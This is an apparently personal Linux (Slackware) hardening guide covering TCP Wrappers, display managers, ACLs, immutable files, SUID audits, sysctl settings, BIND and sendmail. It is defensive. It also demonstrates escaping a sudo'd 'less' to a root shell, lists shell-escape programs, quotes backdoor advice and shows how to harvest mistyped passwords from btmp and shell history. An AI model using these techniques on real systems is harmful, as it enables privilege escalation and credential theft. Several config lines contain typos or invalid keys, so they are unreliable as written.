root@darkstar:/etc/banners# ln -s ../issue.net in.rshd
root@darkstar:/etc/banners# ln -s ../issue.net in.telnetd
root@darkstar:/etc/banners# ln -s ../issue.net popa3d
root@darkstar:/etc/banners# ln -s ../issue.net proftpd
root@darkstar:/etc/banners# ln -s ../issue.net rpc.mound
root@darkstar:/etc/banners# ln -s ../issue.net sendmail
root@darkstar:/etc/banners# ln -s ../issue.net sshd
root@darkstar:/etc/banners# ln -s ../issue.net stunnel
root@darkstar:/etc/banners# ln -s ../issue.net uucico
root@darkstar:/etc/banners# ln -s ../issue.net vsftpd
A command that can be used to determine which daemons use TCP Wrappers:
root@darkstar:~# cd /usr/sbin; for i in `ls | grep -v "@$"`; do \
echo " $i"; strings $i | grep hosts.allow; done | less
To test the /etc/hosts.allow settings:
root@darkstar:~# tcpdchk
root@darkstar:~# tcpdmatch sshd localhost
root@darkstar:~# tcpdmatch sshd 1.1.1.1
root@darkstar:~# tcpdmatch sshd 192.168.1.1
man tcpd
man 5 hosts_access
man hosts_options
man tcpdchk
man tcpdmatch
/etc/hosts.deny:
The only time this file will match is when /etc/hosts.allow is
misconfigured.
all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \
:banners /etc/banners:deny
man tcpd
man 5 hosts_access
man hosts_options
xdm:
/etc/X11/xdm/xdm-config:
DisplayManager*authorize: true
DisplayManager*authName: XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1
DisplayManager.requestPort: 0
man xdm
/etc/X11/xdm/Xresources:
xlogin*greeting: Unauthorized Access Prohibited
xlogin*allowRootLogin: false
xlogin*allowNullPasswd: false
man xdm
xhost:
dentonj@darkstar:~$ xhost
access control enabled, only authorized clients can connect
dentonj@darkstar:~$
If the following line shows up:
INET:localhost
dentonj@darkstar:~$ xhost -localhost
man xhost
man Xsecurity
man Xau
man Xserver
/etc/kde/kdm/kdmrc:
You may not want to set some of these. For example, if the system uses
a runlevel of 4 and is installed on a laptop, you may want to set
"AllowShutdown=ALl". Read the comments in the file.
[Xdmcp]
Enable=false
Port=0
Willing=
[X-*-Core]
AllowRootLogin=false
AllowNullPasswd=false
AllowShutdown=Root
AllowSdForceNow=Root
UseSessReg=true
[X-:*-Core]
ServerArgsLocal=-nolisten tcp
AllowNullPasswd=false
AllowShutdown=Root
NoPassEnable=false
#NoPassUsers=
[X-:0-Core]
AutoLoginEnable=false
#AutoLoginUser=
#AutoLoginPass=
dentonj@darkstar:~# /usr/share/config/kdm/Xwilling
2 users, load: 0.00, 0.00, 0.00
/kde/kde/kdm/Xaccess:
Comment out the following lines:
#* #any host can get a login window
#* CHOOSER BROADCAST #any indirect host can get a chooser
Access Control Lists:
/etc/fstab:
Add the acl mount option:
/dev/sda3 / ext4 defaults,acl 1 1
root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,barrier=1,data=ordered)
root@darkstar:~# mount -o remout,rw,relatime,barrier=1,data=ordered /
root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,acl,barrier=1,data=ordered)
root@darkstar:~# touch test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
group::r--
other::r--
root@darkstar:~# setfacl -m u:dentonj:rw test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
user:dentonj:rw-
group::r--
mask::rw-
other::r--
man acl
man setfacl
man getfacl
/etc/inittab:
Comment out the following line:
#ca::ctraltdel:/sbin/shutdown -t5 -r now
root@darkstar:~# telinit q
[rant]
I actually don't think this is necessary. But I'm including it because
just about every security document on Linux recommends it. It stops anyone
from being able to reboot the system by doing a three finger salute.
Pressing Ctrl-Alt-Del to reboot the system only works if you have physical
access to the keyboard. Even if you disable this feature, it doesn't stop
someone from pulling the power cord or pressing the reset switch to force a
reboot. Most window managers trap Ctrl-Alt-Del anyways.
The only time that I see disabling the above line as being useful is when
you have a Windows admin using Linux. You don't want them rebooting the
system every time they want to lock the system or go to the Task Manager.
Or you can use /etc/shutdown.allow to control when (not exactly who) the
system can be rebooted with Ctrl-Alt-Del. There are security concerns with
using this method. Check the man page for shutdown for details.
[/rant]
Add "-a" to the following line in /etc/inittab to use
/etc/shutdown.allow:
ca::ctraltdel:/sbin/shutdown -t5 -r now -a
root@darkstar:~# telinit q
I like to use dumb terminals. Uncomment the following line:
s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100
root@darkstar:~# telinit q
man init
man inittab
man initscript
man shutdown
man telinit
/etc/shutdown.allow:
dentonj
man shutdown
/etc/securetty:
Make sure only the following are uncommented:
console
tty1
tty2
tty3
tty4
tty5
tty6
man securetty
umask:
There are several ways to set umask:
/etc/login.defs:
UMASK 077
/etc/limits:
* K077
/etc/profile:
umask 077
Umask controls what the initial permissions are for newly created files and
directories. With a umask of 022, new files have the permissions of 644
and new directories have the permissions of 755. Setting the umask to 077
will result in new files being created with the permissions of 600 and new
directories will have the permissions of 700.
Using the umask of 077 will keep others from being able to access users
files. Using a umask of 022 will allow others access to the users files
unless the users takes the time to change the permissions. You can use
cron to periodically remove permissions from the user's home directories.
Setting a restrictive umask can cause problems when you commonly edit
or create files that need to be read accessable to everyone. An example
of files that everyone needs to be able to read are web server pages
located in /srv/httpd/htdocs.
dentonj@darkstar:~$ type -a umask
man bash
man umask
man login.defs
man limits
----[ Filesystem ]----
/etc/fstab:
/dev/sda1 swap swap defaults 0 0
/dev/sda2 / ext4 defaults,acl 1 1
/dev/sda6 /var ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 2
/dev/sda7 /tmp ext4 rw,nosuid,nodev,noexec,acl,relatime,barrier=1,data=ordered 0 2
/dev/sda8 /usr ext4 ro,acl 0 2
/dev/sda9 /home ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 0
/dev/sdb1 /mnt/windows vfat rw,nosuid,nodev,noexec,noauto 0 0
/dev/sdb2 /mnt/slack ext2 rw,noauto 0 0
/dev/cdrom /mnt/cdrom auto noauto,owner,ro 0 0
/dev/fd0 /mnt/floppy auto noauto,owner 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
proc /proc proc defaults 0 0
tmpfs /dev/shm tmpfs defaults 0 0
root@darkstar:~# mkdir /mnt/windows
root@darkstar:~# mkdir /mnt/slack
root@darkstar:~# mkdir /mnt/floppy
root@darkstar:~# mkdir /mnt/thumb
The lines need to wrap. Mount complains about bad options if "\" is used
to break up the lines. Mounting /usr as read-only use to work, but I
have not tested it with Slackware 13.1. Running "lsof" didn't turn up
files that looked like they may be written to in /usr. Your mileage may
vary. Test extensively before using in a production environment. Before
packages can be updated, /usr would have to be remounted as rw. This is
more of a good idea fairy type of idea. I'm on the fence as to whether
or not it adds any security to the system.
man fstab
man nfs
man mount
I use to add "noexec" to /home, but that mount option is pretty trivial to
bypass. Besides, I like having a ~/bin directory for my scripts.
dentonj@darkstar:~$ /lib/ld-linux.so.2 ./some_executable
man ld.so
/sbin/tune2fs:
root@darkstar:~# tune2fs -l /dev/sda3
man tune2fs
man fsck
/usr/bin/chattr:
TODO
Make these files immutable:
- init/rc scripts
- shell, environment, login config files
- passwd files
- server config files
- suid/sgid executables
- commonly trojaned executables
for i in `ls /etc/rc.d`; do
chattr +i /etc/rc.d/$i
done
for i in `ls /etc/apache`; do
chattr +i /etc/apache/$i
done
for i in `ls /etc/mail`; do
chattr +i /etc/mail/$i
done
find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \;
chattr +i /etc/at.deny
chattr +i /etc/exports
chattr +i /etc/ftpusers
chattr +i /etc/host.conf
chattr +i /etc/hosts
chattr +i /etc/hosts.allow
chattr +i /etc/hosts.deny
chattr +i /etc/hosts.equiv
chattr +i /etc/hosts.lpd
chattr +i /etc/inetd.conf
chattr +i /etc/inittab
chattr +i /etc/lilo.conf
chattr +i /etc/login.access
chattr +i /etc/login.defs
chattr +i /etc/named.conf
chattr +i /etc/porttime
chattr +i /etc/profile
chattr +i /etc/protocols
chattr +i /etc/securetty
chattr +i /etc/services
chattr +i /etc/suauth
chattr +i /home/dentonj/.forward
chattr +i /home/dentonj/.netrc
chattr +i /home/dentonj/.rhosts
chattr +i /home/dentonj/.shosts
less /usr/local/sbin/chkrootkit
/TROJAN
chattr +i <the commands listed in the variable TROJAN>
This list should be much longer.
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
man chattr
lcap:
TODO
TODO - list where is can be found and how to compile it.
Remove the CAP_LINUX_IMMUTABLE kernel capability. This prevents the +i
attribute from being removed. I run `lcap` from rc.local. This file is
sourced from the file rc.M. To remove the +i attribute from a file, you'll
have to reboot the system and go into single user mode. This is one of the
few times when you really have to reboot Linux.
If you only access and manage the system remotely, using lcap may cause
problems.
Note: Do this after you are finished with configuring your system.
/etc/rc.d/rc.local:
/usr/local/sbin/lcap CAP_LINUX_IMMUTABLE
root@darkstar:~# touch /tmp/test
root@darkstar:~# chattr +i /tmp/test
root@darkstar:~# lsattr /tmp/test
----i-------- /tmp/test
root@darkstar:~# cd
root@darkstar:~# lcap CAP_LINUX_IMMUTABLE
root@darkstar:~# chattr -i /tmp/test
chattr: Operation not permitted while setting flags on /tmp/test
root@darkstar:~# lcap
Current capabilities: 0xFFFFFCFF
0) *CAP_CHOWN 1) *CAP_DAC_OVERRIDE
2) *CAP_DAC_READ_SEARCH 3) *CAP_FOWNER
4) *CAP_FSETID 5) *CAP_KILL
6) *CAP_SETGID 7) *CAP_SETUID
8) CAP_SETPCAP 9) CAP_LINUX_IMMUTABLE
10) *CAP_NET_BIND_SERVICE 11) *CAP_NET_BROADCAST
12) *CAP_NET_ADMIN 13) *CAP_NET_RAW
14) *CAP_IPC_LOCK 15) *CAP_IPC_OWNER
16) *CAP_SYS_MODULE 17) *CAP_SYS_RAWIO
18) *CAP_SYS_CHROOT 19) *CAP_SYS_PTRACE
20) *CAP_SYS_PACCT 21) *CAP_SYS_ADMIN
22) *CAP_SYS_BOOT 23) *CAP_SYS_NICE
24) *CAP_SYS_RESOURCE 25) *CAP_SYS_TIME
26) *CAP_SYS_TTY_CONFIG
* = Capabilities currently allowed
/etc/cron.*:
root@darkstar:~# chmod -R go-rwx /etc/cron.*
/etc/rc.d:
The system startup scripts are world readable by default.
root@darkstar:~# chmod -R go-rwx /etc/rc.d/
$HOME:
Limit access to $HOME directories:
root@darkstar:~# chmod -R go-wrx /home/dentonj
root@darkstar:~# chmod -R go-rwx /root
man chmod
/var/log:
Limit access to logs:
root@darkstar:~# chmod -R o-rwx /var/log
The following files should be empty if they exist:
/etc/X0.hosts
/etc/d_passwd
/etc/dialups
/etc/environment
/etc/exports
/etc/hosts.lpd
/etc/hosts.equiv
/etc/ssh/shosts.equiv
~/.forward
~/.netrc
~/.rhosts
~/.shosts
Files that normally shouldn't exist:
/etc/fastboot
/etc/forcefsck
/etc/hushlogins
/etc/initrunlvl
/etc/initscript
/etc/nologin
/etc/powerstatus
/etc/upsstatus
~/.hushlogin
Find SUID/SGID files and directories:
root@darkstar:~# find / -type f \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_files.out
root@darkstar:~# find / -type d \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_dirs.out
Find world and group writable files and directories:
root@darkstar:~# find / -type f \( -perm -2 -o -perm -20 \) \
> -ls > write_files.out
root@darkstar:~# find / -type d \( -perm -2 -o -perm -20 \) \
> -ls > write_dirs.out
SUID/SGID:
TODO
Remove the SUID or SGID bit from the following files:
chmod u-s /usr/bin/at
chmod u-s /usr/bin/chage
chmod u-s /usr/bin/chfn
chmod u-s /usr/bin/chsh
chmod u-s /usr/bin/crontab
chmod u-s /usr/bin/expiry
chmod u-s /usr/bin/gpasswd
chmod u-s /usr/bin/lppasswd
chmod u-s /usr/bin/newgrp
chmod u-s /usr/bin/rcp
chmod u-s /usr/bin/rlogin
chmod u-s /usr/bin/rsh
chmod u-s /usr/libexec/ssh-keysign
man chmod
Shell Escapes:
The following is a list of programs that can escape to a shell. This can
either be done by directly starting a new shell, executing shell commands
(which is used to start a shell), or by opening an text editor that can be
used to start a shell.
These programs are not a security concern by themselves. However, if they
are set SUID root or used with sudo, the programs can allow users access to
a root shell.
/etc/sudoers:
dentonj ALL = (ALL) /usr/bin/less /var/log/messages
Start a new shell:
dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
!
bash-3.00#
Open an editor that can start a new shell:
dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
v
:sh
bash-3.00#
Make sure these are not SUID and owned by root. Also make sure they don't
end up in /etc/sudoers. This list is not complete.
/bin/ed /bin/more
/usr/bin/bzmore /usr/bin/crontab -e
/usr/bin/cscope /usr/bin/cu
/usr/bin/cvs -e /usr/bin/cvsbug
/usr/bin/elm /usr/bin/elvis
/usr/bin/ex /usr/bin/flea
/usr/bin/gccbug /usr/bin/gdb
/usr/bin/less /usr/bin/lftp
/usr/bin/mailto /usr/bin/mc
/usr/bin/mcedit /usr/bin/mcview
/usr/bin/mutt /usr/bin/mysql
/usr/bin/mysqlbug /usr/bin/nail
/usr/bin/ncftp /usr/bin/newspost
/usr/bin/nn /usr/bin/perlbug
/usr/bin/pilot /usr/bin/pine
/usr/bin/pg /usr/bin/rpcclient
/usr/bin/sdiff /usr/bin/slrn
/usr/bin/smbclient /usr/bin/tin
/usr/bin/trn /usr/bin/uupick
/usr/bin/vim /usr/bin/zmore
A couple of the things that I used to figure out which commands allow shell
escapes.
root@darkstar:~# cd /usr/bin && for i in `ls | grep -v "@$"`; do
> echo " $i"
> strings $i | grep -e "VISUAL|EDITOR"
> done | less
root@darkstar:~# cd /usr/man/man1 && zgrep -E \
> "\!.*command|execute.*command" *
Find and delete dead symlinks:
find / -type l -print | perl -nle '-e || print'
----[ Network ]----
/etc/rc.d/rc.local:
# Stop arp spoofing used to sniff switched networks
# Set a static ARP entry for the default gateway
arp -s 192.168.1.1 00:00:FE:ED:FA:CE
# Set a static ARP entry for the log host
arp -s 192.168.1.2 00:00:DE:AD:BE:EF
/etc/rc.d/rc.firewall:
The file /etc/rc.d/rc.inet2 check for the existance and then runs
rc.firewall. Create a firewall script and place it here.
----[ Cron ]----
/etc/cron.daily/ntpdate:
#!/bin/sh
/usr/sbin/ntpdate clock.via.net && /sbin/hwclock --systohc
root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate
/etc/cron.daily/cleanup:
#!/bin/sh
/usr/bin/find / -type f -name core -exec /bin/rm -f {} \;
/usr/bin/find /tmp -atime +7 -exec /bin/rm -f {} \;
/usr/bin/find /var/tmp -atime +7 -exec /bin/rm -f {} \;
root@darkstar:~# chmod 700 /etc/cron.daily/cleanup
/etc/cron.daily/paranoid:
#!/bin/sh
/bin/chmod -R go-rwx /home/dentonj
/bin/chmod -R go-rwx /root
/bin/chmod -R o-rwx /var/log
/bin/rm -f /home/dentonj/dead.letter
root@darkstar:~# chmod 700 /etc/cron.daily/paranoid
/var/spool/cron/crontabs/root:
0 3 * * * /usr/bin/find /home -name .rhosts -o -name .forward -ls
Cron should mail the results to root.
root@darkstar:~# crontab -l
root@darkstar:~# crontab -e
man crond
man crontab
/etc/at.allow:
root@darkstar:~# rm /etc/at.deny
root@darkstar:~# touch /etc/at.allow
Don't allow anyone to use at.
Even better, remove at from the system:
root@darkstar:~# removepkg at
man at
----[ Bash ]----
~/.bash_history:
Set the history file so that it can only be appended and not erased by a
user.
root@darkstar:~# chattr +a /home/dentonj/.bash_history
root@darkstar:~# chmod go-wrx /usr/bin/chattr /usr/bin/lsattr
man chattr
man lsattr
man chmod
~/.bash_profile:
trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0
----[ Kernel ]----
/etc/sysctl.conf:
# Improve file system performance
vm.bdflush = 60 64 64 256 500 300 80 0 0
# Increase swap bandwidth system performance
vm.kswapd = 512 32 32
# Enables/Disables memory over commitment
vm.overcommit_memory = 0
# Increases number of page tables keeps in a per-processor cache
vm.pagetable_cache = 25 50
# Increase limit of file-handles
fs.file-max = 8192
# Enable/Disable ignoring ping request
net.ipv4.icmp_echo_ignore_all = 1
# Enable/Disable ignoring broadcasts request
net.ipv4.icmp_ignore_broadcasts = 1
# Enable/Disable IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable/Disable TCP SYN cookie protection
net.ipv4.tcp_syncookies = 1
# Enable/Disable ICMP redirect acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Enable/Disable bad error message protection
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Enable/Disable IP spoofing protection
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
# Enable/Disable log spoofed, source routed,redirect packets
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martions = 1
# Improve shared memory size
kernel.shmall = 134217728
kernel.shmmax = 134217728
# Improve default and maximum window sizes
net.core.vmem_max = 2048000
net.core.vmem_default = 204800
# Enable packet forwarding
net.ipv4.ip_forward = 0
# Change the default TTL to help obscure OS fingerprinting
net.ipv4.ip_default_ttl = 128
root@darkstar:~# sysctl -p /etc/sysctl.conf
root@darkstar:~# sysctl -A
These is already an entry in /etc/rc.d/rc.S that will set the
sysctl settings located in this file during bootup.
man sysctl
man sysctl.conf
/etc/rc.d/rc.modules:
List the kernel modules that are loaded during bootup. Comment out the
ones you feel are unnecessary.
root@darkstar:~# grep -v "^#\|^$" /etc/rc.d/rc.modules
Grsecurity:
TODO
Remove support for kernel modules:
From Phrack 25-5, "Unix Cracking Tips":
"After you gain superuser privileges and you wish to stay root,
here are a few suggestions for installing backdoors:
. . .
- Install new system calls
. . ."
Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your
kernel to remove supports for modules.
CONFIG_MODULES=n
----[ Misc Stuff ]----
/etc/inputrc:
set bell-style none
set mark-directories on
set mark-modified-lines on
set match-hidden-files on
set show-all-if-ambiguous on
set visible-stats on
man bash
man readline
Stuff to remove:
root@darkstar:~# removepkg nn
root@darkstar:~# removepkg slrn
root@darkstar:~# removepkg uucp
root@darkstar:~# removepkg strace
root@darkstar:~# removepkg gdb
root@darkstar:~# removepkg nc
root@darkstar:~# removepkg nmap
root@darkstar:~# removepkg at
This list should be much longer.
/etc/rc.d/rc.local:
# This is hard drive specific, your settings will vary
/usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb
# Turn on NumLock
/usr/bin/setleds -D +num
Make a backup of commonly trojaned commands:
Only do this after a fresh install. Making copies of already trojaned
commands will just ruin your day. If you don't have a fresh install, copy
the commands from the "Live" CD that comes with the official version of
Slackware.
root@darkstar:~# mkdir bin
Copy the following to /root/bin:
/bin/date /bin/du
/bin/echo /bin/grep
/bin/kill /bin/killall
/bin/login /bin/ls
/bin/netstat /bin/ps
/bin/su /bin/tar
/sbin/agetty /sbin/explodepkg
/sbin/getty /sbin/ifconfig
/sbin/installpkg /sbin/makepkg
/sbin/pidof /sbin/removepkg
/sbin/upgradepkg /usr/bin/basename
/usr/bin/biff /usr/bin/chfn
/usr/bin/chsh /usr/bin/crontab
/usr/bin/dirname /usr/bin/env
/usr/bin/find /usr/bin/lsattr
/usr/bin/nail /usr/bin/passwd
/usr/bin/pstree /usr/bin/ssh
/usr/bin/top /usr/bin/traceroute
/usr/bin/write /usr/sbin/gpm
/usr/sbin/hdparm /usr/sbin/in.fingerd
/usr/sbin/in.identd /usr/sbin/in.rlogind
/usr/sbin/in.rshd /usr/sbin/in.telnetd
/usr/sbin/in.timed /usr/sbin/inetd
/usr/sbin/ipop3d /usr/sbin/named
/usr/sbin/rpcinfo /usr/sbin/sendmail
/usr/sbin/sshd /usr/sbin/syslogd
/usr/sbin/tcpd
root@darkstar:~# cd bin
root@darkstar:~/bin# md5sum * >> md5sum
root@darkstar:~/bin# cd
root@darkstar:~# tar zcvf bin.tar.gz ./bin
root@darkstar:~# cp bin.tar.gz /mnt/thumb
It would be a good idea to run `chattr +i ...` on all of the original files.
Passwords in logs and history files:
It's not uncommon for someone to make a mistake while logging in or
switching users and type the password in the wrong place. Be aware that
"dumpster diving" in system logs and other users history files is a common
practice by evil doers to obtain passwords. Keep this in mind when
deciding to store 6 months worth of logs or when setting HISTFILESIZE to a
$LARGENUMBER.
This is lastb output on a Slackware 11.0 system:
root@darkstar:~# lastb
P@ssw0rd1! Fri Jun 23 19:04 - 19:04 (00:00)
dentonj Fri Jun 23 19:03 - 19:03 (00:00)
The output of lastb is different in Slackware 13.1, with long usernames
being truncated.
root@darkstar:~# lastb
mysupers tty3 Sun Aug 18 15:35 - 15:35 (00:00)
dentonj tty3 Sun Aug 18 13:16 - 13:16 (00:00)
root@darkstar:~# strings /var/log/btmp | grep mysupers
mysupersecretpassword
root@darkstar:~# less /home/dentonj/.bash_history
<contents of .bash_history>
/us <-- type this to search for "us"
. . .
us -
!QAZzaq1
. . .
/etc/wgetrc:
Ignore the robots.txt file on web servers.
robots = off
----[ Program Hardening ]----
/usr/sbin/atalkd:
TODO
/etc/netatalk/atalkd.conf:
/etc/netatalk/afpd.conf:
/etc/netatalk/AppleVolumes.default:
/etc/netatalk/AppleVolumes.system:
/etc/netatalk/netatalk.conf:
/etc/netatalk/papd.conf:
man afpd
man afpd.conf
man AppleVolumes.default
man atalkd
man atalkd.conf
man netatalk.conf
man papd
/usr/sbin/named:
/etc/named.conf:
acl "allowed" {
localhost;
192.168.1.0/24;
};
acl "denied" {
0.0.0.0/8;
1.0.0.0/8;
2.0.0.0/8;
5.0.0.0/8;
7.0.0.0/8;
10.0.0.0/8;
23.0.0.0/8;
27.0.0.0/8;
31.0.0.0/8;
36.0.0.0/8;
37.0.0.0/8;
39.0.0.0/8;
42.0.0.0/8;
49.0.0.0/8;
50.0.0.0/8;
92.0.0.0/8;
93.0.0.0/8;
94.0.0.0/8;
95.0.0.0/8;
100.0.0.0/8;
101.0.0.0/8;
102.0.0.0/8;
103.0.0.0/8;
104.0.0.0/8;
105.0.0.0/8;
106.0.0.0/8;
107.0.0.0/8;
108.0.0.0/8;
109.0.0.0/8;
110.0.0.0/8;
111.0.0.0/8;
112.0.0.0/8;
113.0.0.0/8;
114.0.0.0/8;
115.0.0.0/8;
116.0.0.0/8;
117.0.0.0/8;
118.0.0.0/8;
119.0.0.0/8;
120.0.0.0/8;
169.254.0.0/16;
172.16.0.0/12;
173.0.0.0/8;
174.0.0.0/8;
175.0.0.0/8;
176.0.0.0/8;
177.0.0.0/8;
178.0.0.0/8;
179.0.0.0/8;
180.0.0.0/8;
181.0.0.0/8;
182.0.0.0/8;
183.0.0.0/8;
184.0.0.0/8;
185.0.0.0/8;
186.0.0.0/8;
187.0.0.0/8;
192.0.2.0/24;
//192.168.0.0/16;
197.0.0.0/8;
223.0.0.0/8;
224.0.0.0/3;
};
key "rndc-key" {
algorithm hmac-md5;
secret "Thisisafakekey==";
};
controls {
inet 127.0.0.1 port 953
allow { 127.0.0.1; } keys { "rndc-key"; };
};
options {
directory "/var/named";
pid-file "/var/named/named.pid";
statistics-file "/var/named/named.stats";
memstatistics-file "/var/named/named.memstats";
dump-file "/var/named/named.dump";
zone-statistics yes;
transfer-format many-answers;
interface-interval 0;
allow-transfer { none; };
allow-query { allowed; };
allow-recursion { allowed; };
blackhole { denied; };
tcp-clients 32;
forwarders { 1.2.3.4; 5.6.7.8; };
version none;
hostname none;
rfc2038-type1 no;
};
logging {
channel default_syslog {
syslog daemon;
severity info;
stderr;
print-category yes;
print-severity yes;
};
channel query_log {
file "/var/log/named.queries" versions 6 size 20m;
severity info;
print-time;
print-category yes;
print-severity yes;
};
category default { default_syslog; };
category general { default_syslog; };
category security { default_syslog; };
category config { default_syslog; };
category resolver { default_syslog; };
category xfer-in {default_syslog; };
category xfer-out {default_syslog; };
category notify { default_syslog; };
category client { default_syslog; };
category network { default_syslog; };
category update { default_syslog; };
category update-security { default_syslog; };
category lame-servers { default_syslog; };
category queries { query_log; };
category database { default_syslog; };
category unmatched { default_syslog; };
catefory dispatch { default_syslog; };
category dnssec { default_syslog; };
category delegation-only { default_syslog; };
};
zone "." IN {
type hint;
file "caching-example/named.ca";
};
zone "localhost" IN {
type master;
file "caching-example/named.local";
allow-update { none; };
notify no;
};
zone "0.0.127.in-addr.arpa" IN {
type master;
file "caching-example/named.local";
allow-update { none; };
notify no;
};
/etc/rndc.conf:
key "rndc-key" {
algorithm hmac-md5;
secret "Thisisafakekey==";
};
options {
default-key "rndc-key";
default-server 127.0.0.1;
default-port 953;
};
root@darkstar:~# groupadd -g 53 named
root@darkstar:~# useradd -c "BIND" -d /var/named -g 53 -u 53 \
-s /bin/false named
root@darkstar:~# dig @a.root-servers.net . ns > \
/var/named/caching-example/named.ca
root@darkstar:~# chmod 600 /etc/named.conf
root@darkstar:~# chown named.named /etc/named.conf
root@darkstar:~# chmod 600 /etc/rndc.conf
root@darkstar:~# chown named.named /etc/rndc.conf
root@darkstar:~# chown -R named.named /var/named/
root@darkstar:~# chown named.named /var/run/named/
/etc/rc.d/rc.bind:
/usr/sbin/named -u named
To generate the keys for rndc:
root@darkstar:~# rndc-confgen -b 512
To check the configuration:
root@darkstar:~# named-checkconf -z
zone localhost/IN: loaded serial 42
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
root@darkstar:~# named-checkzone localhost \
/var/named/caching-example/localhost.zone
zone localhost/IN: loaded serial 42
OK
root@darkstar:~# named-checkzone 0.0.127.in-addr.arpa \
/var/named/caching-example/named.local
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
OK
root@darkstar:~# named-checkzone . /var/named/caching-example/named.ca
zone ./IN: has 0 SOA records
root@darkstar:~# chmod 700 /etc/rc.d/rc.bind
root@darkstar:~# /etc/rc.d/rc.bind start
root@darkstar:~# rndc status
man named
man named-checkconf
man named-checkzone
man rndc
man rndc.conf
man rndc-confgen
man lwresd
dentonj@darkstar:~$ links /usr/doc/bind-9.3.2-P1/arm/Bv9ARM.html
The above example sets up BIND as a caching only DNS server. "Explain
benefits." The problem with this setup is that you are running a daemon
that isn't entirely necessary. Unnecessary services can potentially
provide an attacker with more information then they should have or they
can provide an attacker with a way to break into your system.
Unless you are setting up a caching name server as a way
of learning how to setup and run BIND, you are better off removing BIND
from the system. One of the problems with removing the BIND package on
Slackware is the useful commands "dig", "host", and "nslookup" will also
be removed.
root@darkstar:~# removepkg bind
TODO - Chroot
/usr/sbin/sendmail:
/etc/mail/sendmail.cf:
#O DontBlameSendmail=Safe
O MaxHopCount=25
O HelpFile=/etc/issue.net
O ForwardPath=/etc/forward
O LogLevel=15
#O DaemonPortOptions=Name=MTA
#O DaemonPortOptions=Port=587,Name=MSA,M=E
O DaemonPortOptions=Address=127.0.0.1
O ClientPortOptions=Family=inet,Address=127.0.0.1
O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun,
restrictexpand,noetrn,nobodyreturn
O Timeout.ident=0
O SmtpGreetingMessage=$j Unauthorized Access Prohibited.
O AllowBogusHELO=False
O UnsafeGroupWrites=True
O RrtImpliesDSN=False
$.by $j with id $i$?{tls_version}
root@darkstar:~# touch /etc/forward
$HOME/.forward:
The .forward file allows users to easily forward email. However, the
file can also be used to run a program every time an email is received.
There are several ways to disable use of the .forward file.
Set the ForwardPath option so that it points to something other than
the default. The option has to be set to something, otherwise sendmail
sets ForwardPath to $HOME/.forward.
O ForwardPath=/etc/forward
You can allow programs to be run, but restrict which ones can be run by
using smrsh.
You can disable forwarding in sendmail all together. However, the bat
book warns that Bad Things(TM) can happen is you completely disable
forwarding. Remove the "w" flag from the line located in
/etc/mail/sendmail.cf:
Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=.....
Mlocal, P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=.....
You can try to have root create and own the .forward file in each of
the user's home directories. But the user can move the .forward file
and create a new file.
root@darkstar:~# touch /home/dentonj/.forward
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
dentonj@darkstar:~$ ls -l .forward.moved
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward.moved
However, making the file immutable stops this.
root@darkstar:~# touch /home/dentonj/.forward
root@darkstar:~# chattr +i /home/dentonj/.forward
root@darkstar:~# lsattr /home/dentonj/.forward
----i-------- /home/dentonj/.forward
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:19 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
mv: cannot move `.forward' to `.forward.moved': Operation not permitted
/usr/sbin/smrsh:
TODO
/etc/mail/aliases:
I use to comment out most of these. Now I'm more interested if someone
actually tries to send email to any of them.
postmaster: root, dentonj
bin: root, dentonj
daemon: root, dentonj
games: root, dentonj
ingres: root, dentonj
nobody: root, dentonj
system: root, dentonj
toor: root, dentonj
uucp: root, dentonj
manager: root, dentonj
dumper: root, dentonj
webmaster: root, dentonj
abuse: root, dentonj
decode: root, dentonj
Add any additional system account present in /etc/passwd:
admin: root, dentonj
ftp: root, dentonj
mail: root, dentonj
mysql: root, dentonj
smmsp: root, dentonj
sshd: root, dentonj
root@darkstar:~# newaliases
man aliases
man newaliases
If you only need to run sendmail for local mail, use cron.
root@darkstar:~# /etc/rc.d/rc.sendmail stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail
/etc/cron.hourly/mqueue
#!/bin/sh
/usr/sbin/sendmail -q
root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue
man crond
/usr/sbin/httpd:
